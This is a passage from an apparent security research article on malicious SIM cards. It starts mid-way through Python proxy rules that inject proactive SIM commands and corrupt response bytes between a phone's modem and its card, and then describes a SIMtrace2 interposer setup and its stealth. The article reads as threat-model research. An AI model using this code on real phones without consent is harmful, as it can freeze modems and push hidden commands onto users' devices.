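            return r[:-2] + bytes([0x91, len(cmd)])
        if armed[0] and c[1] == FETCH:
            armed[0] = False
            return cmd + b"\x90\x00"
        return r
    return rule


def flip_data_byte(seed):
    """Rule: invert one byte of every non-empty response body (deterministic for a given seed)."""
    rng = random.Random(seed)

    def rule(c, r):
        body = bytearray(r[:-2])
        if body:
            body[rng.randrange(len(body))] ^= 0xFF
        return bytes(body) + r[-2:]
    return rule


def modem_boot(proxy):
    """Constructed modem-side sequence: SELECT MF, DF_GSM, EF_IMSI, READ BINARY, then a STATUS
    poll, followed by FETCH if the card reports a pending proactive command, as a real ME does.
    Stops at the first 6A xx, where a real modem would fall back or reject the card."""
    last = b""
    for hexcmd in ("A0A40000023F00", "A0A40000027F20", "A0A40000026F07", "A0B0000009", "A0F2000000"):
        last = proxy.forward(bytes.fromhex(hexcmd))
        if last[-2] == 0x6A:
            return last
    if last[-2] == 0x91:
        last = proxy.forward(bytes([0xA0, FETCH, 0x00, 0x00, last[-1]]))
    return last
```

The `inject_proactive` rule is the interesting one for the attack scenarios in this article: the phone's own polling (STATUS) is what opens the door, so an interposer does not have to wait for an OTA message to get a command executed. The trace the proxy keeps is also the cheapest way to see what a modem sent back when it crashed or froze, which is exactly the evidence the OnePlus and Samsung observations above rest on.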
The main characteristics of the inter-card adapter used in the study:
Based on SIMtrace2 — open-hardware project with USB interface.
Built around an Atmel SAM3S microcontroller, driven from the host over USB, with support for a PC/SC mode.
Supports T=0 and T=1 protocols, fully compatible with ISO 7816.
Allows you to monitor traffic, filter or modify APDU commands on the fly.
Can work in two modes: tracing (passively sniffing the phone-to-SIM traffic) or card emulation (answering the phone itself, so commands can be intercepted and replaced).
What does this give in terms of attack?
Increased stealth — the attack occurs at the physical level, without changes to the phone itself. This allows you to stay “off the radar” of any antivirus or threat detection system.
Modularity — interposer allows you to easily connect any other tool instead of SIMURAI, for example, your own Python script for automating attacks or an APDU command logger.
Dynamicity: the card's behaviour can be changed in real time: add new scenarios, change the reaction to a command, deliberately malform a TLV structure.
Ease of installation is another plus. The Interposer is easy to connect at home. The researcher only needs:
a phone with a physical SIM slot;
a SIMtrace2 board (a plain PC/SC reader is not enough: it can read cards, but it cannot stand in for one in a phone);
a short SIM-format adapter cable;
a laptop or SBC (such as Raspberry Pi) running Linux;
SIMURAI installed and configured.
No changes to the phone’s firmware, no root access, nothing that could give away the testing. It is precisely this simplicity that makes such attacks possible even for enthusiasts, and not just for government hacking units.
Thus, the interposer is not just a demonstration tool. It is a fundamental component of the modern approach to SIM threat testing, which allows you to look at mobile security from a completely different level: physical interception and simulation, and not just logical analysis.
For many years, SIM cards were considered “transparent” — a small piece of plastic that simply opens up access to the network. They were not considered active players in the security model. But the results of this study change everything. The SIMURAI platform, tested on real devices, has demonstrated that a SIM can be malicious, can initiate attacks, control interaction with the modem, bypass protection and even freeze devices, while remaining completely “invisible”.
This radically changes the perception of threats in mobile systems. While developers focus on APK files, root rights, backdoors in applications or phishing links, a real “trojan” can hide in the SIM — and no security system will see it.
Several key findings are particularly troubling:
No modern mobile OS checks the behavior of the SIM card: it trusts all commands without exception.
Phone modems handle STK poorly: even simple commands such as REFRESH can cause a denial of service or disturb the radio interface.
Tools like SIMURAI have become available to everyone: open source, simple hardware, step-by-step documentation – now every researcher (and not only) can do it.
The SIM attack vector is attractive for intelligence work because the modem initialises the SIM the moment it powers up, before the application OS and its defences are running.
eSIMs are not exempt: an eUICC is a physical secure element soldered to the board that runs the same applications and the same toolkit protocol. What changes is that its profiles are provisioned remotely, so a hostile profile no longer requires anyone to touch the phone.
If SIM-level attacks once sounded like something out of a spy film, today an adapter and a script are enough to put a fully scripted, hostile card in front of a phone's modem. And the phone will not notice anything is wrong.
So the main message of this article is to reconsider the threat model. If you work in mobile security, forget the idea that the SIM is a passive part. It can be a source of threats, a data exfiltration channel, a DoS trigger, even a spy. And the main reason such attacks have not been seen at scale, their technical complexity, has largely fallen away.
A SIM card is no longer just plastic. It’s a processor with its own code, logic, and full access to the most sensitive parts of the system. Ignoring this means remaining blind to a new wave of threats.